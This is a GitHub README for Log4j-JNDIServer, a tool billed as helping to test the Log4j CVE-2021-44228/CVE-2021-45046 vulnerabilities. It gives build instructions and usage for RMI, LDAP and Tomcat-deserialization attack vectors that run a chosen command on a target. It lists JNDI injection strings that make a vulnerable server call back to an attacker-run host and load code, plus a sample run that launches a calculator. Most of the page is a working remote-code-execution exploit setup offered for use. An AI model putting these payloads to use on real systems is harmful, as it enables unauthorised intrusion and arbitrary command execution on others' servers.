Skip to content

This project will help to test the Log4j CVE-2021-44228 vulnerability.

Notifications You must be signed in to change notification settings

immunityinc/Log4j-JNDIServer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Log4j-JNDIServer

This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities.

Installation and Building

  • Load the project on Intellij Idea
  • Select JDK in "Projects Settings" (CTRL + ALT + SHIFT + S)
  • In "Project Settings", create the Artifact -> "Artifacts" -> "Create JAR from Modules" -> In "JAR files from libraries", mark "extract to target JAR" -> "OK"
  • Build Project (CTRL + F9). This will create the jar file in /out/artifacts/ folder

Building with Maven

Requires Java 1.8+ and Maven 3.x+

  • mvn clean package -DskipTests
  • You will find the .jar file in /target folder

Usages

1.RMI Attack Vector

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

You don't need to host the Exploit.class anymore. The app will start an HTTP server on the indicated port.

You must indicate the command you want to run in the target.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.LDAP Attack Vector

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

You don't need to host the Exploit.class anymore. The app will start an HTTP server on the indicated port.

You must indicate the command you want to run in the target.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.Deserialization Attack Vector (Using Tomcat payload)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Example

$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -

About

This project will help to test the Log4j CVE-2021-44228 vulnerability.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages